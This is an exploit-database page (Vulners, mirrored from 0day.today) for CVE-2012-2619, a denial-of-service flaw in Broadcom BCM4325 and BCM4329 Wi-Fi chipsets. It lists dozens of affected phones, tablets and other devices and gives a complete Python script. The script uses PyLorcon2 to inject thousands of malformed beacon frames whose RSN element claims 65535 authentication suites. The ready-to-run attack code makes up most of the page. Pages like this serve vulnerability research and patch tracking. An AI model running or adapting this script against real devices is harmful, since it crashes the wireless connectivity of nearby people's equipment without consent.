Vulners
Lucene search
Broadcom DoS on BCM4325 and BCM4329 Devices
# Exploit Author:
CoreLabs (Core Security Technologies) fue descubierta por el
investigador argentino Andrés Blanco,
# Vendor Homepage:
# Software Link: [download link if available]
# Version: 1.0
# Tested on:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge
Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad"
# CVE : 2012-2619
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096
# Frame Control
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
frame += '\x00' # Flags: 0
frame += '\x00\x00' # Duration: 0
frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
#part of the generator
# Frame Body
frame += struct.pack('Q', time.time()) # Timestamp
frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
frame += '\x11\x04' # Capability Information: ESS, Privacy,
#Short Slot time
# Information Elements
# SSID: buggy
frame += '\x00\x05buggy'
# Supported Rates: 1,2,5.5,11,18,24,36,54
frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
# DS Parameter Set: 6
frame += '\x03\x01\x06'
# RSN IE
frame += '\x30' # ID: 48
frame += '\x14' # Size: 20
frame += '\x01\x00' # Version: 1
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
frame += '\x01\x00' # Pairwise cipher suite count: 1
frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
frame += '\xff\xff' # Authentication suites count: 65535
frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
frame += '\x00\x00'
sequence += 1
yield frame
if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "\t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)
iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()
generator = beaconFrameGenerator()
for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)
# 0day.today [2018-03-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Nov 2012 00:00Current
7High risk
Vulners AI Score7